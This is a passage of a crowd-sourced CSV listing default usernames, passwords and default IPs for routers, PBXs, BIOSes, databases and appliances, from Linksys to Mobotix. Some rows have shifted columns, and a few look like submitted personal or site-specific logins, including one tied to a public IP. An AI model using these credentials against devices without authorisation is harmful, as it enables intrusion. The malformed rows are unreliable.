voicemailbox,,\nlinksys,SVR200,,,,498,Autoattendant,,\nlinksys,SVR3000,,,(AA Admin number),4x98,Autoattendant,,\nlinksys,SVR3000,,,(AA Admin number),4x99,Autoattendant,,\nlinksys,SVR3000,,,(username),3+(extension),User Access,,\nlinksys,SVR3000,,,,3450,Operator voicemailbox,,\nlinksys,SVR3000,,,,498,Autoattendant,,\nlinksys,SVR3500,,,(AA Admin number),4x98,Autoattendant,,\nlinksys,SVR3500,,,(AA Admin number),4x99,Autoattendant,,\nlinksys,SVR3500,,,(username),3+(extension),User Access,,\nlinksys,SVR3500,,,,3450,Operator voicemailbox,,\nlinksys,SVR3500,,,,498,Autoattendant,,\nlinksys,WAG120N,,http://192.168.1.1,admin,admin,Administration,,\nlinksys,WAG160N,,http://192.168.1.1 or 10.1.1.1,admin,admin,Administration,,\nlinksys,WAG200G,,http://192.168.1.1,admin,admin,Administration,,\nlinksys,WAG320N,,http://192.168.1.1,admin,admin,Admin,,\nlinksys,WAG325N,,http://192.168.1.1,admin,admin,Administration,,\nlinksys,WAG54G,,HTTP,admin,admin,Admin,,\nlinksys,WAG54G,All,192.168.1.1,admin,admin,Admin,,\nlinksys,WAG54G2,,http://192.168.1.1,admin,admin,Administration,,\nlinksys,WAG54GP2,,http://192.168.1.1,admin,admin,Administration,,\nlinksys,WAG54GS,,192.168.1.1,admin,admin,Admin,,\nlinksys,WAG54GS,,Multi,admin,admin,Admin,,\nlinksys,WAG54GX2,,http://192.168.1.1,admin,admin,Administration,,\nlinksys,WAP Router,,4 Port 2.4GHz,,admin,,,\nlinksys,WAP11,,,admin,admin,,,\nlinksys,WAP11,,Multi,,,Admin,,\nlinksys,WAP200,,http://192.168.1.245,,admin,Admin,,\nlinksys,WAP4400N,,http://192.168.1.245,,admin,Admin,,\nlinksys,WAP4400N,business series,192.168.1.245,admin,admin,admin,,\nlinksys,WAP44OON,2,4-GHZ,http://192.168.1.245,Admin,Admin,,\nlinksys,WAP51AB,,console,,Admin,Admin,,\nlinksys,WAP54A,,http://192.168.1.252,,admin,Web-Based Config Utility,,\nlinksys,WAP54G Router,,http://192.168.1.245,,admin,,,\nlinksys,WAP54G,,,,admin,,,\nlinksys,WAP54G,2,http://192.168.1.245,,admin,Admin,,\nlinksys,WAP54GP,,http://192.168.1.245,admin,admin,Administration,,\nlinksys,WAP54GPE,,http://192.168.1.245,admin,admin,Administration,,\nlinksys,WAP54GX,,http://192.168.1.245,admin,admin,Administration,,\nlinksys,WAP54GX,1,web,,admin,192.168.1.245,There is no username; it will not work if you connect with a username.,\nlinksys,WAP54GX,1.0,web ,,admin,192.168.1.245,There is no username; it will not work if you connect with a username.,\nlinksys,WAP55AG,1,2,http://192.168.1.246,,admin,,\nlinksys,WAP55AG,1.0, 2.0 ,http://192.168.1.246,,admin,,\nlinksys,WCG200,,http://192.168.0.1,,admin,Administration,,\nlinksys,WET11,,,,admin,Admin,,\nlinksys,WET54G,,,,admin,Admin,,\nlinksys,WET610N,,http://192.168.1.250,admin,admin,Administration,,\nlinksys,WGA11B,,,,admin,Admin,,\nlinksys,WGM124,,http://192.168.1.1,admin,password,Admin,,\nlinksys,WGR101,,http://192.168.0.1,admin,password,Admin,,\nlinksys,WMB54G,,,,admin,Admin,,\nlinksys,WRK54G Router,,,,admin,,,\nlinksys,WRK54G Router,,192.168.1.1,root,,Admin,,\nlinksys,WRK54G,,192.168.1.1,,admin,Admin,,\nlinksys,WRP400,,192.168.15.1 or 192.168.16.1,admin,admin,,,\nlinksys,WRT120N,,192.168.1.1,,admin,Admin,,\nlinksys,WRT150N,,192.168.1.1,admin,admin,,,\nlinksys,WRT160N,V2,http://192.168.1.1,admin,admin,admin,,\nlinksys,WRT160NL,,http://192.168.1.1,admin,admin,admin,,\nlinksys,WRT160n,V2,http://192.168.1.1,admin,admin,admin,,\nlinksys,WRT300N,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRT310N,,http://192.168.1.1,,admin,Admin,,\nlinksys,WRT320N,,http://192.168.1.1,,admin,Admin,,\nlinksys,WRT350N,,http://192.168.1.1,admin,admin,admin,,\nlinksys,WRT400,,http://192.168.1.1,,admin,Admin,,\nlinksys,WRT54G Router,,,,admin,,,\nlinksys,WRT54G v4,2.4,http:192.168.1.245,,admin,,,\nlinksys,WRT54G,,Admin,admin,admin,,,\nlinksys,WRT54G,,HTTP,admin,admin,Admin,,\nlinksys,WRT54G,2.4,http:192.168.1.245,,admin,,,\nlinksys,WRT54G2,,192.168.1.1,admin,admin,Admin,,\nlinksys,WRT54G3G,,192.168.1.1,,admin,Admin,,\nlinksys,WRT54GC,,,admin,admin,,,\nlinksys,WRT54GC,,192.168.1.1,,admin,Admin,,\nlinksys,WRT54GC,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRT54GH,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRT54GL,,192.168.1.1,admin,admin,Admin,,\nlinksys,WRT54GL,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRT54GP2,,http://192.168.15.1,,admin,Administration,,\nlinksys,WRT54GP2A-AT,,http://192.168.15.1,,admin,Administration,,\nlinksys,WRT54GR,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRT54GS Router,,,,admin,,,\nlinksys,WRT54GS,,Admin,admin,admin,,,\nlinksys,WRT54GS,1.1,HTTP,admin,admin,Admin,,\nlinksys,WRT54GX,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRT54GX2,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRT54GX4,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRT55AG Router,,,,admin,,,\nlinksys,WRT600,,http://192.168.1.1,,admin,Admin,,\nlinksys,WRT600N,,http://192.168.1.1,admin,admin,Admin,,\nlinksys,WRT610N,,http://192.168.1.1,admin,admin,Admin,,\nlinksys,WRTP54G-ER,,http://192.168.15.1,admin,admin,Admin,,\nlinksys,WRTSL54GS,,http://192.168.1.1,,admin,Administration,,\nlinksys,WRV54G,,,admin,admin,,,\nlinksys,WRV54G,,Multi,admin,admin,,,\nlinksys,WRVS4400N,,192.168.1.1,admin,admin,Admin,,\nlinksys,WTR54GS,,192.168.16.1,,admin,Administration,,\nlinksys,WTR54GS,,http://192.168.16.1,,admin,Administration,,\nlinksys,X3000,,192.168.1.1,admin,admin,Admin,,\nlinksys,wrt110,,admin,admin,admin,,,\nlinksyssipura,SPA-1001,,,admin,,2012-01-08,,\nlinksyssipura,SPA-2100,,192.168.0.1,admin,,2012-01-08,,\nlinksyssipura,SPA-2102,,,,,2012-01-08,,\nlinksyssipura,SPA-3000,,,admin,admin,2012-01-08,,\nlinksyssipura,SPA-3102,,,admin,,2012-01-08,,\nlinunx,Linux,,,Administrator,admin,,,\nlinux,Slackware,,,gonzo,,,,\nlinux,Slackware,,,satan,,,,\nlinux,Slackware,,,snake,,,,\nlinux,Slackware,,Multi,gonzo,,User,,\nlinux,Slackware,,Multi,satan,,User,,\nlinux,Slackware,,Multi,snake,,User,,\nlinux,Slackware,,User,gonzo,,,,\nlinux,Slackware,,User,satan,,,,\nlinux,Slackware,,User,snake,,,,\nlinux,UCLinux for UCSIMM,,,root,uClinux,,,\nlinux,UCLinux for UCSIMM,,Admin,root,uClinux,,,\nlinux,UCLinux for UCSIMM,,Multi,root,uClinux,Admin,,\nlinux,back trak,3 and 4,,root,toor,,penetration version hacking WiFi,\nliquidwarelabs,Stratusphere UX,,,ssadmin,sspassword,,,\nlivingston,IRX Router,,,!root,,,,\nlivingston,IRX Router,,Telnet,!root,,,,\nlivingston,Livingston Portmaster 3,,,!root,,,,\nlivingston,Officerouter,,,!root,,,,\nlivingston,Officerouter,,,!root,blank,,,\nlivingston,Officerouter,,Telnet,!root,,,,\nlivingston,Portmaster 2R,,Telnet,root,,Admin,,\nlivingston,Portmaster 3,,Telnet,!root,,,,\nlivingston,Portmaster,03-Feb,,!root,blank,,,\nlivingston,Portmaster,2/3,,!root,blank,,,\nlivingstone,Portmaster 2R,,,root,,,,\nlivingstone,Portmaster 2R,,Admin,root,,,,\nlockdownnetworks,All Lockdown Products,up to 2.7,Console,setup,changeme(exclamation),User,,\nlogitech,Logitech Mobile Headset,,Bluetooth,,0,audio access,,\nloglogic,Loglogic Appliance,,,root,logapp,,,\nloglogic,Loglogic Appliance,,,toor,logapp,,,\nlongshine,isscfg,,,admin,0,,,\nlongshine,isscfg,,HTTP,admin,0,Admin,,\nlucent,AP-1000,,,public,public,,,\nlucent,Anymedia,,,LUCENT01,UI-PSWD-01,,,\nlucent,Anymedia,,,LUCENT02,UI-PSWD-02,,,\nlucent,Anymedia,,Admin,LUCENT01,UI-PSWD-01,,,\nlucent,Anymedia,,Admin,LUCENT02,UI-PSWD-02,,,\nlucent,Anymedia,,Console,LUCENT01,UI-PSWD-01,Admin,requires GSI software,\nlucent,Anymedia,,Console,LUCENT02,UI-PSWD-02,Admin,requires GSI software,\nlucent,B-STDX9000,,,(any 3 characters),cascade,,,\nlucent,B-STDX9000,,,(any 3 chars),cascade,,,\nlucent,B-STDX9000,,,,cascade,,,\nlucent,B-STDX9000,,Multi,(any 3 characters),cascade,,,\nlucent,B-STDX9000,,SNMP readwrite,,cascade,,,\nlucent,B-STDX9000,,all,,cascade,,,\nlucent,B-STDX9000,,debug mode,,cascade,,,\nlucent,B-STDX9000,all,SNMP,,cascade,Admin,,\nlucent,CBX 500,,,(any 3 characters),cascade,,,\nlucent,CBX 500,,,,cascade,,,\nlucent,CBX 500,,Multi,(any 3 characters),cascade,,,\nlucent,CBX 500,,SNMP readwrite,,cascade,,,\nlucent,CBX 500,,debug mode,,cascade,,,\nlucent,Cajun Family,,,root,root,,,\nlucent,Cellpipe 22A-BX-AR USB D,,Console,admin,AitbISP4eCiG,Admin,,\nlucent,GX 550,,,(any 3 characters),cascade,,,\nlucent,GX 550,,,,cascade,,,\nlucent,GX 550,,Multi,(any 3 characters),cascade,,,\nlucent,GX 550,,SNMP readwrite,,cascade,,,\nlucent,GX 550,,debug mode,,cascade,,,\nlucent,M770,,Telnet,super,super,Admin,,\nlucent,MAX-TNT,,,admin,Ascend,,,\nlucent,MAX-TNT,,Multi,admin,Ascend,,,\nlucent,Max TNT,,9.1.3,,admin,,,\nlucent,PSAX 1200 and below,,,root,ascend,,,\nlucent,PSAX 1200 and below,,Multi,root,ascend,,,\nlucent,PSAX 1250 and above,,,readonly,lucenttech2,,,\nlucent,PSAX 1250 and above,,,readwrite,lucenttech1,,,\nlucent,PSAX 1250 and above,,Multi,readonly,lucenttech2,,,\nlucent,PSAX 1250 and above,,Multi,readonly,lucenttech2,Admin,,\nlucent,PSAX 1250 and above,,Multi,readwrite,lucenttech1,,,\nlucent,PSAX 1250 and above,,Multi,readwrite,lucenttech1,Admin,,\nlucent,PacketStar,,Multi,Administrator,,Admin,,\nlucent,Packetstar (PSAX),,,readwrite,lucenttech1,,,\nlucent,Portmaster 2,,,!root,,,,\nlucent,Portmaster 3,,,!root,!ishtar,,,\nlucent,Portmaster 3,,,!root,!ishtar,,unknown,\nlucent,Stinger,,,admin,Ascend,,,\nlucent,System 75,,,bciim,bciimpw,,,\nlucent,System 75,,,bcim,bcimpw,,,\nlucent,System 75,,,bcms,bcmspw,,,\nlucent,System 75,,,bcnas,bcnaspw,,,\nlucent,System 75,,,blue,bluepw,,,\nlucent,System 75,,,browse,browsepw,,,\nlucent,System 75,,,browse,looker,,,\nlucent,System 75,,,craft,craft,,,\nlucent,System 75,,,craft,craftpw,,,\nlucent,System 75,,,cust,custpw,,,\nlucent,System 75,,,enquiry,enquirypw,,,\nlucent,System 75,,,field,support,,,\nlucent,System 75,,,inads,inads,,,\nlucent,System 75,,,inads,indspw,,,\nlucent,System 75,,,init,initpw,,,\nlucent,System 75,,,locate,locatepw,,,\nlucent,System 75,,,maint,maintpw,,,\nlucent,System 75,,,maint,rwmaint,,,\nlucent,System 75,,,nms,nmspw,,,\nlucent,System 75,,,pw,pwpw,,,\nlucent,System 75,,,rcust,rcustpw,,,\nlucent,System 75,,,support,supportpw,,,\nlucent,System 75,,,sysadm,sysadmpw,,,\nlucent,System 75,,,tech,field,,,\nlucent,System 75,,Multi,bciim,bciimpw,,,\nlucent,System 75,,Multi,bcim,bcimpw,,,\nlucent,System 75,,Multi,bcms,bcmspw,,,\nlucent,System 75,,Multi,bcnas,bcnaspw,,,\nlucent,System 75,,Multi,blue,bluepw,,,\nlucent,System 75,,Multi,browse,browsepw,,,\nlucent,System 75,,Multi,browse,looker,,,\nlucent,System 75,,Multi,craft,craft,,,\nlucent,System 75,,Multi,craft,craftpw,,,\nlucent,System 75,,Multi,cust,custpw,,,\nlucent,System 75,,Multi,enquiry,enquirypw,,,\nlucent,System 75,,Multi,field,support,,,\nlucent,System 75,,Multi,inads,inads,,,\nlucent,System 75,,Multi,inads,indspw,,,\nlucent,System 75,,Multi,init,initpw,,,\nlucent,System 75,,Multi,locate,locatepw,,,\nlucent,System 75,,Multi,maint,maintpw,,,\nlucent,System 75,,Multi,maint,rwmaint,,,\nlucent,System 75,,Multi,nms,nmspw,,,\nlucent,System 75,,Multi,pw,pwpw,,,\nlucent,System 75,,Multi,rcust,rcustpw,,,\nlucent,System 75,,Multi,support,supportpw,,,\nlucent,System 75,,Multi,sysadm,admpw,,,\nlucent,System 75,,Multi,sysadm,sysadmpw,,,\nlucent,System 75,,Multi,sysadm,syspw,,,\nlucent,System 75,,Multi,tech,field,,,\nluxoncommunications,IP Phone,,http,administrator,19750407,Admin,,\nluxul,ABR-4400,,192.168.0.1,admin,admin,Admin,,\nluxul,AMS-2616P,,192.168.0.4,admin,admin,Admin,,\nluxul,AMS-4424P,,192.168.0.4,admin,admin,Admin,,\nluxul,XAP-1010,,192.168.0.10,admin,admin,Admin,,\nluxul,XAP-1020,,192.168.0.11,admin,admin,Admin,A few units were shipped with default IP 192.168.0.15 - try that if 192.168.0.11 doesn't work,\nluxul,XAP-1030,,192.168.0.12,admin,admin,Admin,,\nluxul,XAP-1032,,192.168.0.13,admin,admin,Admin,,\nluxul,XAP-1040,,192.168.0.14,admin,admin,Admin,,\nluxul,XAP-1050,,192.168.0.15,admin,admin,Admin,,\nluxul,XAP-1200,,192.168.0.10,admin,admin,Admin,,\nluxul,XAP-1230,,192.168.0.10,admin,admin,Admin,,\nluxul,XAP-1500,,192.168.0.16,admin,admin,Admin,,\nluxul,XAP-310,,192.168.0.10,admin,admin,Admin,,\nluxul,XBR-2300,,192.168.0.1,admin,admin,Admin,,\nluxul,XBR-4400,,192.168.0.1,admin,admin,Admin,,\nluxul,XFS-1816P,,192.168.0.4,admin,admin,Admin,,\nluxul,XMS-1008P,,192.168.0.3,admin,admin,Admin,,\nluxul,XMS-1010P,,192.168.0.3,admin,admin,Admin,,\nluxul,XMS-1024,,192.168.0.2,admin,admin,Admin,,\nluxul,XMS-1024P,,192.168.0.4,admin,admin,Admin,,\nluxul,XMS-2624P,,192.168.0.4,admin,admin,Admin,,\nluxul,XVW-P30,,192.168.0.11,admin,admin,Admin,,\nluxul,XVW-P30E,,192.168.0.11,admin,admin,Admin,,\nluxul,XWC-1000,,192.168.0.19,admin,admin,Admin,,\nluxul,XWR-1750,,192.168.0.1,admin,admin,Admin,,\nluxul,XWS-1310,,192.168.0.19,admin,admin,Admin,,\nm technology,PC BIOS,,,,mMmM,,,\nm technology,PC BIOS,,Admin,,mMmM,,,\nmachspeed,PC BIOS,,,,sp99dd,,,\nmachspeed,PC BIOS,,Admin,,sp99dd,,,\nmachspeed,PC BIOS,,Console,,sp99dd,Admin,,\nmacromedia,Dreamweaver,,,,admin,,,\nmacromedia,Dreamweaver,,FTP,,admin,Guest,,\nmacromedia,Dreamweaver,,Guest,,admin,,,\nmacsense,X-Router Pro,,,admin,admin,,,\nmagento,Go,,,admin,123123,,,\nmagic-pro,PC BIOS,,,,prost,,,\nmagic-pro,PC BIOS,,Admin,,prost,,,\nmagicpro,PC BIOS,,Console,,prost,Admin,,\nmain street softworks,MCVE,,2.5,MCVEADMIN,password,,,\nmain street softworks,MCVE,,Admin,MCVEADMIN,password,,,\nmainstreetsoftworks,MCVE,2.5,Multi,MCVEADMIN,password,Admin,,\nmambo,Site Server,,4.x,admin,admin,,,\nmambo,Site Server,4.x,HTTP,admin,admin,Admin,,\nmanageengine,ADSelfService Plus,,,admin,admin,,,\nmanageengine,Desktop Central,,,admin,admin,,,\nmandarinlibraryautomation,M3,,,admin,boca raton,,,\nmantis,Mantis,,,administrator,root,,,\nmantis,Mantis,,,administrator,root,Admin,,\nmanufactor,Product,,Access_Validated,User,Password,,,\nmarconi,Fore ATM Switches,,,ami,,,,\nmarconi,Fore ATM Switches,,Admin,ami,,,,\nmarconi,Fore ATM Switches,,Multi,ami,,Admin,,\nmaxdata,ms2137,,Multi,,,Admin,,\nmaxon,EtherMax,,192.168.0.1,admin,admin,Admin,,\nmcafee,3100,4.x, 5.x,local, ssh,root,root,\nmcafee,3100,4.x,5.x,local,ssh,root,!scmchangeme,\nmcafee,IntruShield IPS Sensor,,,admin,admin123,,,\nmcafee,IntruShield IPS Sensor,1.8,SSH,admin,admin123,,,\nmcafee,IntruShield IPS Sensor,1.9,SSH,admin,admin123,,,\nmcafee,IntruShield IPS Sensor,2.1,SSH,admin,admin123,,,\nmcafee,IntruShield IPS Sensor,3.1,SSH,admin,admin123,,,\nmcafee,IntruShield Manager,,,admin,admin123,,,\nmcafee,IntruShield Manager,1.8,HTTP,admin,admin123,,,\nmcafee,IntruShield Manager,1.9,HTTP,admin,admin123,,,\nmcafee,IntruShield Manager,2.1,HTTP,admin,admin123,,,\nmcafee,IntruShield Manager,3.1,HTTP,admin,admin123,,,\nmcafee,SCM 3100,4.1,Multi,scmadmin,scmchangeme,Admin,,\nmcafee,SCM 3200,,http,scmadmin,changeme,Admin,,\nmcafee,e250,,,webshield,webshieldchangeme,,,\nmcafee,e250,,HTTP,webshield,webshieldchangeme,,,\nmcdata,FC Switches/Directors,,Multi,Administrator,password,Admin,,\nmediatrix,2102,,http://x.x.x.x:8080,root,5678,,,\nmediatrix2102,,,http://192.168.1.102,admin,1234,,,\nmediatrix2102,mediatrix 2102,,HTTP,admin,1234,Admin,,\nmedion,Routers,,HTTP,,medion,Admin,,\nmegastar,BIOS,,Console,,star,Admin,,\nmegastar,PC BIOS,,,,star,,,\nmegastar,PC BIOS,,Admin,,star,,,\nmegastar,PC BIOS,,Console,,star,Admin,,\nmelco,AirStation WLA-L11,,,root,,,Root acct cannot be changed, no password by default,\nmelco,AirStation WLA-L11,,,root,,,Root acct cannot be changed,no password by default\nmemotec,CX Line,,Console,memotec,supervisor,,,\nmemotec,CX Line,Any,Multi,memotec,supervisor,Console,,\nmentec,Micro/RSX,,,MICRO,RSX,,,\nmentec,Micro/RSX,,,MICRO,RSX,Admin,,\nmentec,Micro/RSX,,Admin,MICRO,RSX,,,\nmentec,Micro/RSX,,Multi,MICRO,RSX,Admin,,\nmercury interactive,Topaz Prism,,,admin,admin,,,\nmercury,234234,,234234,Administrator,admin,,,\nmercury,234234,,Admin,Administrator,admin,,,\nmercury,234234,234234,SNMP,Administrator,admin,Admin,,\nmercury,KT133A/686B,,,Administrator,admin,,,\nmercury,KT133A/686B,,Admin,Administrator,admin,,,\nmercury,KT133A/686B,,SNMP,Administrator,admin,Admin,,\nmercury,Topaz Prism,,http,admin,admin,Admin,,\nmeridian,PBX,ANY,Telnet,service,smile,System,This is the default password on most Meridian systems.,\nmetro,phone,,voicemail,client,client,,,\nmichiel,PHPList,2.6.4,http,admin,phplist,Admin,,\nmichiel,PHPlist,,2.6.4,admin,phplist,,,\nmicro soft,yahoo messenger,,,sherzad420,pakistan,,,\nmicrocom,ADSL Routers,,,admin,epicrouter,Admin,,\nmicrocom,ADSL Routers,,,user,password,Admin,,\nmicrocom,Unknown,,,admin,superuser,,,\nmicrocom,hdms,,,system,hdms,,,\nmicrocom,hdms,,,system,hdms,,unknown,\nmicron,PC BIOS,,,,sldkj754,,,\nmicron,PC BIOS,,,,xyzall,,,\nmicron,PC BIOS,,Admin,,sldkj754,,,\nmicron,PC BIOS,,Admin,,xyzall,,,\nmicron,PC BIOS,,Console,,sldkj754,Admin,,\nmicron,PC BIOS,,Console,,xyzall,Admin,,\nmicronet,3351 / 3354,,Multi,admin,epicrouter,Admin,,\nmicronet,Access Point,,Admin,root,default,,,\nmicronet,Access Point,,SP912,root,default,,,\nmicronet,SP3356,,,admin,epicrouter,,,\nmicronet,SP3356,,HTTP,admin,epicrouter,,,\nmicronet,SP3357,,HTTP,admin,epicrouter,admin,,\nmicronet,SP3357,,admin,admin,epicrouter,,,\nmicronet,SP5002,,Console,mac,,Admin,,\nmicronet,SP756,,HTTP,admin,1234,admin,,\nmicronet,SP912 Access Point,,Telnet,root,default,Admin,,\nmicronet,SP916BM Wireless Broadband Router,,http,admin,admin,Admin,,\nmicronet,SP916GK,V2,HTTP,admin,,Admin,,\nmicronet,Wireless Broadband Router,,SP916BM,admin,admin,,,\nmicronica,SOHOmate HiP-400,,192.168.123.254,,admin,Admin,,\nmicronica,SOHOmate WiP-400,,192.168.123.254,,admin,Admin,,\nmicronics,PC BIOS,,,,dn_04rjc,,,\nmicronics,PC BIOS,,Admin,,dn_04rjc,,,\nmicronics,PC BIOS,,Console,,dn_04rjc,Admin,,\nmicroplex,Print Server,,,root,root,,,\nmicroplex,Print Server,,Admin,root,root,,,\nmicroplex,Print Server,,Telnet,root,root,Admin,,\nmicrorouter,900i,,,,letmein,,,\nmicrorouter,900i,,Admin,,letmein,,,\nmicrorouter,900i,,Console/Multi,,letmein,Admin,,\nmicrosoft,200 server,,,,,,,\nmicrosoft,Great Plains,,,LessonUser1,,,,\nmicrosoft,Great Plains,,,LessonUser2,,,,\nmicrosoft,Great Plains,All,Multi,LessonUser1,,,,\nmicrosoft,Great Plains,All,Multi,LessonUser2,,,,\nmicrosoft,MN-100,,http://192.168.2.1,,admin,Administration,,\nmicrosoft,MN-500,,http://192.168.2.1,,admin,Administration,,\nmicrosoft,MN-700,,http://192.168.2.1,,admin,Administration,,\nmicrosoft,MN500 Base Station,,,,admin,Admin,,\nmicrosoft,MN700 Wireless AP/Router,,,MSHOME,MSHOME,,,\nmicrosoft,NT,,,,start,,,\nmicrosoft,NT,,,free user,user,,4,\nmicrosoft,SQL Server 2000,,SP3,sa,,,,\nmicrosoft,SQL Server,,,,sa,,,\nmicrosoft,SQL Server,,7,sa,,,,\nmicrosoft,SQL Server,,Admin,sa,,,,\nmicrosoft,SQL Server,7,Multi,sa,,Admin,,\nmicrosoft,SiteServer,,3.x,LDAP_Anonymous,LdapPassword_1,,,\nmicrosoft,SiteServer,3.x,http,LDAP_Anonymous,LdapPassword_1,,,\nmicrosoft,Windows NT,,,,,,,\nmicrosoft,Windows NT,,,Administrator,,,,\nmicrosoft,Windows NT,,,Administrator,,,All,\nmicrosoft,Windows NT,,,Administrator,Administrator,,,\nmicrosoft,Windows NT,,,Guest,,,All,\nmicrosoft,Windows NT,,,Guest,Guest,,,\nmicrosoft,Windows NT,,,IS_$hostname,(same),,,\nmicrosoft,Windows NT,,,Mail,,,All,\nmicrosoft,Windows NT,,,User,User,,,\nmicrosoft,Windows NT,,,pkoolt,pkooltPS,,4,\nmicrosoft,Windows NT,,Admin,Administrator,,,,\nmicrosoft,Windows NT,,Admin,Administrator,Administrator,,,\nmicrosoft,Windows NT,,Multi,Administrator,,Admin,,\nmicrosoft,Windows NT,,Multi,Administrator,Administrator,Admin,,\nmicrosoft,Windows NT,,Multi,Guest,,User,,\nmicrosoft,Windows NT,,Multi,Guest,Guest,User,,\nmicrosoft,Windows NT,,Multi,IS_$hostname,(same),User,hostname is your servername,\nmicrosoft,Windows NT,,Multi,User,User,User,,\nmicrosoft,Windows NT,,User,Guest,,,,\nmicrosoft,Windows NT,,User,Guest,Guest,,,\nmicrosoft,Windows NT,,User,IS_$hostname,(same),,,\nmicrosoft,Windows NT,,User,User,User,,,\nmicrosoft,Windows Storage Server 2008,,,Administrator,wSS2008!,,,\nmike peters,BasiliX,,1.1.1,bsxuser,bsxpass,,,\nmikepeters,BasiliX,1.1.1,sql,bsxuser,bsxpass,Admin,,\nmikrotik,,2.27,,admin,,172.16.11.1,,\nmikrotik,,2.9.27,,admin,admin,,,\nmikrotik,,2.9.27,http://10.0.0.138,admin,,,,\nmikrotik,,3.20,192.168.2.2,admin,0111313071,,MikroTik,\nmikrotik,,MikroTik v3.25,telnet,admin,admin,root,hello,\nmikrotik,Groove 5Hn,,192.168.88.1,admin,,Admin,,\nmikrotik,Groove a5Hn,,,admin,,Admin,,\nmikrotik,MKE-3.28, 3.28 ,http://189.150.32.11/,admin,admin,root,,\nmikrotik,MKE-3.28,3.28,http://189.150.32.11/,admin,admin,root,,\nmikrotik,MicroTik,2.9.27,,admin,123,,,\nmikrotik,Mikrotik,2.95,,multilink,,,,\nmikrotik,Mikrotik2.9.42 windows xp,2.9.42,,admin,admin,admin,,\nmikrotik,RB/411,,192.168.88.1,admin,,Admin,,\nmikrotik,RB1000,,,admin,,Admin,,\nmikrotik,RB1100,,192.168.88.1,admin,,Admin,,\nmikrotik,RB1100AH,,192.168.88.1,admin,,Admin,,\nmikrotik,RB1200,,,admin,,Admin,,\nmikrotik,RB450,,192.168.88.1,admin,,Admin,,\nmikrotik,RB450G,,192.168.88.1,admin,,Admin,,\nmikrotik,RB600A,,,admin,,Admin,,\nmikrotik,RB750,4.1,http://192.168.0.254,admin,,root,,\nmikrotik,RB750G,,192.168.88.1,admin,,Admin,,\nmikrotik,RB750GL,,192.168.88.1,admin,,Admin,,\nmikrotik,RB751U-2HnD,,192.168.88.1,admin,,Admin,,\nmikrotik,RB800,,192.168.88.1,admin,,Admin,,\nmikrotik,Router OS,2.9.17,HTTP,admin,,Admin,,\nmikrotik,Router OS,all,Telnet,admin,,Admin,also for SSH and Web access,\nmikrotik,Sextant,,192.168.88.1,admin,,Admin,,\nmikrotik,TD-W8901N,1.0,172.16.0.1,,,Admin,not,\nmikrotik,Windows 7,v5.22,http://10.0.0.254,admin,admin,admin,heheheheh,\nmikrotik,Windows XP,3.2,10.15.113.1,admin,admin,,,\nmikrotik,mikrotik webbox 2.9.27,mikrotik webbox 2.9.27,mikrotik webbox 2.9.27,admin,admin,admin,admin,\nmikrotik,mikrotik411AR,5.2,00:0C:42:D7:79:FD,admin,,admin,HSL3w,\nmikrotik,speedy,10.1,admin,rfnet,admin,admin,admin,\nmikrotik,wbr-2310,1.0,192.168.7.103,admin,,admin,,\nmikrotik,webbox 4.11,webbox-4.11,http://192.168.18.1,admin,,,,\nmikrotik,webbox,2.9.27,,admin,admin,admin,admin,\nmikrotik,webbox,2.9.6,192.168.0.254,hakeri,123456,guest,split.walker-production@hotmail.com,\nmikrotik,webbox,2.9.6,bounce,admin,admin,bounce,,\nmikrotik,webbox,2.9.6,bounce,admin,admin,bounce,12345,\nmikrotik,windows XP,RouterOS v5.23,192.168.88.1,admin,,admin,,\nmikrotik,windows xp,2.9.27,192.168.0.5,admin,18022011,root,,\nmikrotik,windows xp,2.9.34,http://10.1.11.1,admin,admin,Admin,,\nmikrotik,windows xp,webbox 2.9.27 login,192.168.2.1,admin,admin,root,,\nmilan,mil-sm801p,,Multi,root,root,Admin,,\nminitar,MN54G4R,,192.168.1.253,,admin,Admin,,\nminitar,MNWAPB,,192.168.1.1,admin,1234,Admin,,\nminitar,MNWAPGR,,192.168.123.254,,admin,Admin,,\nminitar,MVA11A,,192.168.3.1,admin,admin,Admin,,\nminoltaqms,Magicolor 3100,3.0.0,HTTP,admin,,Admin,Gives access to Accounting,\nminoltaqms,Magicolor 3100,3.0.0,HTTP,operator,,Admin,,\nmintel,Mintel PBX,,,,SYSTEM,,,\nmintel,Mintel PBX,,,,SYSTEM,Admin,,\nmintel,Mintel PBX,,Admin,,SYSTEM,,,\nmitel,3300 ICP,all,HTTP,system,password,Admin,,\nmitel,5000,5.1.0.20,192.168.200.201,admin,itpassw,admin,,\nmitel,MN3100ICP,,,system,mnet,,,\nmitel,MN3100ICP,,HTTP,system,mnet,,,\nmitel,SX200,All,Maint Port/attendant console,installer,1000,unlimited,This access controlls all other levels,\nmitel,SX2000,all,Multi,,,Admin,,\nmitel,SX2000,light,console,system,sx2000,Full installer,,\nmitel,sx2000,light,console,system,sx2000,Full installer,,\nmitelnetworks,SX2000,,,1nstaller,5X2000,,,\nmitelnetworks,SX2000,,,installer,sx2000,,,\nmitelnetworks,SX2000,,,maint1,sx2000,,,\nmitelnetworks,SX2000,,,maint2,sx2000,,,\nmitelnetworks,SX2000,,,s1stem,5X2000,,,\nmitelnetworks,SX2000,,,system,sx2000,,,\nmklencke,Forumtalk,1.0rc2,,root,blablabla,Admin,,\nmobotix,D10,,10.1.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.1.0.11),\nmobotix,D10,,ISDN Dial in,linux,tux,,,\nmobotix,D12,,10.1.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.1.0.11),\nmobotix,D14,,10.1.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.1.0.11),\nmobotix,D22M,,10.8.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.8.0.11),\nmobotix,D24M,,10.8.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.8.0.11),\nmobotix,M1,,10.1.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 10.1.0.11),\nmobotix,M1,,ISDN Dial in,linux,tux,,,\nmobotix,M10,,10.1.0.99,admin,meinsm,Admin Menu,Default IP may differ - see sticker on device (Try also 